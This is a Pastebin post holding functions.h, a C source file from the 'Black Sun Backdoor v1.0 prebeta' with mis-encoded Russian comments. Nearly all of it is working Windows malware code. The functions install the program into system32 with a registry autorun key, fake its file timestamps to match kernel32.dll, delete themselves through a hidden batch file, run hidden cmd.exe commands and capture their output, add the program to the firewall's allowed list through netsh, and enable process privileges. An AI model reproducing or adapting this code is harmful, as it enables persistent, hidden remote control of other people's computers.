Advertisement
FlyFar

src/functions.h

May 17th, 2024
546
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.38 KB | Cybersecurity | 0 0
 1. /*
 2.  *  ---------------------------------------------------------------------
 3.  *         ____  _            _     _____            
 4.  *        |  _ \| |          | |   / ____|            
 5.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
 6.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
 7.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
 8.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
 9.  *                 Black Sun Backdoor v1.0 prebeta        
 10.  *
 11.  *                          (x) Cytech 2007
 12.  *
 13.  *  ---------------------------------------------------------------------
 14.  *  [functions.h]
 15.  *      ôóíêöèè äëÿ ðàáîòû ñ ñèñòåìîé (óñòàíîâêà â ñèñòåìó, ñàìîóäàëåíèå
 16.  *      è ò.ä)
 17.  *  ---------------------------------------------------------------------
 18.  */
 19.  
 20. // ----------------------- [ ñîçäàíèå ïîòîêà ] ----------------------- //
 21.  
 22. static HANDLE WINAPI StartThread(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID param)
 23. {
 24.     DWORD lpThreadId;
 25.     return CreateThread(NULL, NULL, lpStartAddress, param, NULL, &lpThreadId);
 26. }
 27.  
 28. // --------------- [ Ïðîïèñûâàíèå ñåáÿ â ðååñòðå è ñàìîóäàëåíèå èç ðååñòðà ] ---------------- //
 29.  
 30. static DWORD WINAPI AddSelfToRun(char *mode)
 31. {
 32.     HKEY hkey, zhkey;
 33.     char str[256], sysbuf[256], myname[256], kernl[256];
 34.     HANDLE hTimeFile;
 35.     FILETIME aFileTime, bFileTime, cFileTime;
 36.     GetModuleFileName(GetModuleHandle(NULL), str, 256);
 37.  
 38.     GetSystemDirectory(sysbuf, 256);
 39.     lstrcpy(myname, sysbuf);
 40.     lstrcat(myname, "\\");
 41.     lstrcat(myname, EXENAME);
 42.  
 43.     if(lstrcmp(mode,"addtorun")==0) // ïðîïèñûâàåì ñåáÿ â àâòîçàãðóçêó
 44.     {
 45.         if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, REGKEY, 0, KEY_WRITE,&hkey)==ERROR_SUCCESS)
 46.             {
 47.              // ïîëó÷àåì äàòó ñîçäàíèÿ kernel32.dll
 48.                 lstrcpy(kernl, sysbuf); lstrcat(kernl, "//");  lstrcat(kernl, KERNEL32_DLL);
 49.                 hTimeFile = CreateFile(kernl, GENERIC_READ, FILE_SHARE_READ, 0,
 50.                                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
 51.          
 52.                 if (hTimeFile != INVALID_HANDLE_VALUE)
 53.                 {
 54.                     GetFileTime(hTimeFile, &aFileTime, &bFileTime, &cFileTime);
 55.                     CloseHandle(hTimeFile);
 56.                 }
 57.  
 58.                 CopyFile(str, myname, FALSE);
 59.                
 60.                 hTimeFile = CreateFile(myname, GENERIC_WRITE, FILE_SHARE_WRITE, 0,
 61.                             OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
 62.                            
 63.                 // óñòàíàâëèâàåì ñåáå äàòó ñîçäàíèÿ kernel32.dll, ÷òîáû ìåíüøå ñâåòèòüñÿ â òîì ñëó÷àå,
 64.                 // åñëè ñïëàéñèíã ðàáîòàòü íå áóäåò (íàïðèìåð, çàãðóçêà ÎÑ â Safe Mode).
 65.  
 66.                 if (hTimeFile != INVALID_HANDLE_VALUE)
 67.                 {
 68.                     SetFileTime(hTimeFile, &aFileTime, &bFileTime, &cFileTime);
 69.                     CloseHandle(hTimeFile);
 70.                 }
 71.  
 72.                 // ïèøåì ñåáÿ â ðååñòð
 73.                 if (RegSetValueEx(hkey, REGNAME, 0, REG_SZ, myname, lstrlen(myname)) == ERROR_SUCCESS);
 74.                 {
 75.                     RegCloseKey(hkey);
 76.                 }
 77.             }
 78.     }
 79.     else if(lstrcmp(mode, "killmyself")==0) // óäàëÿåìñÿ èç àâòîçàãðóçêè
 80.     {
 81.         if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, REGKEY, 0, KEY_WRITE,&zhkey)==ERROR_SUCCESS)
 82.             {
 83.                 RegDeleteValue(zhkey, REGNAME);
 84.                 RegCloseKey(zhkey);
 85.             }
 86.     }
 87.     return 0;
 88. }
 89.  
 90. // ----------------------- [ ñàìîóäàëåíèå ÷åðåç ñîçäàíèå .bat ] ----------------------- //
 91.  
 92. // Ôóíêöèÿ ñàìîóäàëåíèÿ ñ ïîìîùüþ .bat-ôàéëà :). Ëàìåðñòâî :)) Àëüòåðíàòèâíûì ñïîñîáîì
 93. // ìîæíî þçàòü èíæåêò â äðóãîé ïðîöåññ è îò òóäà ñîçäàòü ïîòîê íà ñàìîóäàëåíèå ïðîñòî ñ
 94. // ïîìîùüþ DeleteFile :) Ïîòîì ïåðåäåëàþ.
 95. // Ñóòü æå ýòîãî ìåòîäà çàêëþ÷àåòñÿ â òîì, ÷òî ñîçäàåòñÿ áàòíèê â ïàïêå system32 ñëåäóþùåãî âèäà:
 96. // ---- [ self.bat ] ----
 97. //  @ECHO off
 98. //  :try
 99. //      DEL C:\WINDOWS\system32\blacksun.exe
 100. //  GOTO try
 101. //      DEL C:\WINDOWS\system32\self.bat
 102. // ---- [ self.bat ] ----
 103. // Ïðè çàïóñêå îí ïûòàåòñÿ óäàëèòü ñåáÿ è ñàì áýêäîð äî òåõ ïîð, ïîêà íå ñäåëàåò ýòî.
 104. // Â ýòî âðåìÿ áýêäîð ïðîñòî çàâåðøàåò ñâîé ïðîöåññ, à áàòíèê óäàëÿåò è ñåáÿ è áýêäîð.
 105.  
 106. static DWORD WINAPI DeleteSelfWithBat()
 107. {
 108.     DWORD dwSz;
 109.     HANDLE hFile;
 110.     char szSelfBatDel[256], szSelfName[256];
 111.     char szTemp[256];
 112.     GetModuleFileName(GetModuleHandle(NULL), szSelfName, sizeof(szSelfName));
 113.  
 114.      GetSystemDirectory(szSelfBatDel, 256);
 115.      lstrcat(szSelfBatDel, "\\");
 116.      lstrcat(szSelfBatDel, SELFDEL_BAT);
 117.  
 118.     hFile = CreateFile(szSelfBatDel, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
 119.  
 120.     if (hFile != INVALID_HANDLE_VALUE)
 121.     {
 122.         ZeroMemory (&szTemp, sizeof(szTemp));
 123.        
 124.         lstrcpy(szTemp, "@ECHO off\r\n:try\r\nDEL ");
 125.         lstrcat(szTemp, &szSelfName);
 126.         lstrcat(szTemp,"\r\nIF EXIST ");
 127.         lstrcat(szTemp, &szSelfName);
 128.         lstrcat(szTemp, " GOTO try\r\n");
 129.         lstrcat(szTemp, "DEL ");
 130.         lstrcat(szTemp,  &szSelfBatDel);   
 131.  
 132.         dwSz = sizeof(szTemp);
 133.         WriteFile(hFile, szTemp, dwSz, &dwSz, NULL);
 134.         CloseHandle(hFile);
 135.         WinExec(szSelfBatDel, SW_HIDE);
 136.         Sleep(100);
 137.         ExitProcess(0);
 138.     }
 139.  
 140.     return 0;
 141. }
 142.  
 143. static DWORD WINAPI DeleteSelfFirstTime(LPVOID lpParam)
 144. {
 145.     DeleteSelfWithBat();
 146.     return 0;
 147. }
 148.  
 149. // ----------------------- [ âûïîëíåíèå êîìàíä ñ ïîìîùüþ cmd.exe ] ----------------------- //
 150.  
 151. static DWORD WINAPI ExecuteCMD(char * command)
 152. {
 153.         SECURITY_ATTRIBUTES sec;
 154.         PROCESS_INFORMATION pi;
 155.         STARTUPINFO si;
 156.         HANDLE hOutR, hOutW;
 157.         DWORD BTAvail;
 158.         char * Result = NULL;
 159.         char * cmdline = NULL;
 160.         char cmdpath[256];
 161.         OSVERSIONINFO OSVersionInfo;
 162.         DWORD Read = 0;
 163.  
 164.             fZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
 165.             fZeroMemory(&sec, sizeof(SECURITY_ATTRIBUTES));
 166.             sec.nLength = sizeof(SECURITY_ATTRIBUTES);
 167.             sec.bInheritHandle = TRUE;
 168.             sec.lpSecurityDescriptor = NULL;
 169.    
 170.     if (CreatePipe(&hOutR, &hOutW, &sec, 0))
 171.     {
 172.                 fZeroMemory(&si, sizeof(STARTUPINFO));
 173.                 si.cb = sizeof(STARTUPINFO);
 174.                 si.hStdOutput = hOutW;
 175.                 si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
 176.                 si.wShowWindow = SW_HIDE;
 177.  
 178.             cmdline = (char *) GlobalAlloc(GMEM_FIXED, (7 + lstrlen(command)));
 179.             lstrcat(lstrcpy(cmdline, " /a /c "), command);
 180.  
 181.             OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
 182.             GetVersionEx (&OSVersionInfo);
 183.  
 184.             if (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
 185.             {
 186.                 GetEnvironmentVariable(COMSPEC, cmdpath, 2048);
 187.             }
 188.  
 189.         if (CreateProcess(cmdpath, cmdline, &sec, &sec, TRUE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
 190.         {
 191.             WaitForSingleObject(pi.hProcess, INFINITE);
 192.             CloseHandle(pi.hThread);
 193.             CloseHandle(pi.hProcess);
 194.             PeekNamedPipe (hOutR, NULL, 0, NULL, &BTAvail, NULL);
 195.                 if (BTAvail > 0)
 196.                 {
 197.                     Result = (char *) GlobalAlloc(GMEM_FIXED, BTAvail + 1);
 198.                     ReadFile(hOutR, Result, BTAvail, &Read, NULL);
 199.                     Result[BTAvail] = '\0';
 200.                     OemToChar(Result, Result);
 201.                     if(lstrlen(Result) > 0){    return Result; }
 202.                     else { return MSG_CMDEXECUTED; }
 203.                 }
 204.  
 205.         }
 206. }
 207.     return 0;
 208. }
 209.  
 210. // ----------------------- [ ñïðÿòàòü/ïîêàçàòü îêíî ] ----------------------- //
 211.  
 212. static DWORD WINAPI SetWindowStatus(HWND hWnd, char *mode)
 213. {
 214.         if (lstrcmp(mode, "show")==0)
 215.         {
 216.             ShowWindow(hWnd, SW_SHOW);
 217.         }
 218.         else if (lstrcmp(mode, "hide")==0)
 219.         {
 220.             ShowWindow(hWnd, SW_HIDE);
 221.         }
 222.     return 0;
 223. }
 224.  
 225. // ------------------ [ äîáàâëíèå ñàìîãî ñåáÿ â netsh êàê äîâåðåííîå ïðèëîæåíèå ] ------------------ //
 226.  
 227. // Íåäàâíî âîò ïîïàëñÿ ìíå òðîé â ðóêè, ïðîäèçàñìèâ åãî, ÿ óâèäåë òàì ýòó ñòàðóþ,
 228. // íî ïîëåçíóþ ôè÷ó. Ðåøèë äîáàâèòü è ñþäà. Ñàìîäîáàâëåíèå â äîâåðåííûå ïðèëîæåíèÿ ôàéðâîëà
 229. // NetSH (ñòàíäàðòíàÿ âèíäîâñêèé ôàéð). Ïðîñòî âûïîëíÿåòñÿ êîìàíäà:
 230. // netsh firewall set allowedprogram C:\WINDOWS\system32\blacksun.exe enable
 231.  
 232. static DWORD WINAPI NetSHFirewallReg()
 233. {
 234.     char fireexec[256], my_path[256];
 235.     GetModuleFileName(0, my_path, 256);
 236.    
 237.         lstrcpy(fireexec, NETSH_ADD_1);
 238.         lstrcat(fireexec,  my_path);
 239.         lstrcat(fireexec, NETSH_ADD_2);
 240.        
 241.     WinExec(fireexec, SW_HIDE);
 242.     return 0;
 243. }
 244.  
 245. // ------------------ [ ïîëó÷åíèå êàêèõ-ëèáî ïðèâåëåãèé ] ------------------ //
 246.  
 247. // Ïîëó÷åíèå ïðèâåëåãèé ïðîöåññà, íàïðèìåð, ïðèâåëåãèé îòëàä÷èêà èëè shutdown-ïðèâåëåãèé
 248.  
 249. static BOOL SetPrivilege(char* SeNamePriv, BOOL EnableTF)
 250. {
 251.    HANDLE hToken;
 252.    LUID SeValue;
 253.    TOKEN_PRIVILEGES tp;
 254.  
 255.    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
 256.    {
 257.     return FALSE;
 258.    }
 259.    
 260.    if (!LookupPrivilegeValue(NULL, SeNamePriv, &SeValue))
 261.    {
 262.       CloseHandle(hToken);
 263.       return FALSE;
 264.    }
 265.    
 266.    tp.PrivilegeCount = 1;
 267.    tp.Privileges[0].Luid = SeValue;
 268.    tp.Privileges[0].Attributes = EnableTF ? SE_PRIVILEGE_ENABLED : 0;
 269.    
 270.    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
 271.  
 272.    CloseHandle(hToken);
 273.    return TRUE;
 274. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement